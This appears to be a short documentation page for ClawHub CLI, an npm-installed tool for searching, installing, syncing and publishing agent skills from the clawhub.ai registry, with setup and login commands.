What is ClawHub CLI?

ClawHub CLI serves as the primary gateway for developers to interact with the broader ecosystem of Openclaw Skills. It streamlines the lifecycle of agent enhancements by providing a unified interface to fetch new functionalities on the fly, synchronize local setups with the latest registry versions, and share custom-built skills with the community. By utilizing advanced caching and compression, it ensures that your AI agents remain performant and up-to-date.

This utility bridges the gap between local development environments and the cloud-based registry, allowing for seamless integration of specialized behaviors into your AI workflows. Whether you are building complex automation pipelines or simple productivity hacks, managing your Openclaw Skills through this CLI provides the version control and reliability needed for production-grade agent deployments.

ClawHub CLI Use Cases

  • Searching for specific database or automation capabilities within the registry.
  • Installing the latest version of a skill or pinning to a specific semver version.
  • Synchronizing all installed Openclaw Skills to their latest versions using hash-based matching.
  • Publishing custom-developed agent skills to clawhub.ai for community or private use.
  • Automating skill management within CI/CD pipelines or deployment scripts.

How ClawHub CLI Works

  1. User initiates a command via the CLI, which interacts with the openclawcli utility running on the host machine.
  2. For installations, the CLI fetches the compressed skill package from the registry and extracts it to the designated directory.
  3. During updates, the tool generates hashes for local files and compares them against registry metadata to determine if a newer version is available.
  4. When publishing, the CLI validates the SKILL.md metadata and structure before uploading the assets to the central repository.
  5. Configuration settings are resolved from environment variables, local .clawhubrc files, or command-line flags to determine registry URLs and file paths.

ClawHub CLI Setup

Ensure the openclawcli prerequisite is running for your platform, then install the package globally via npm:

npm i -g clawhub

To begin publishing or managing private assets, authenticate your session:

clawhub login
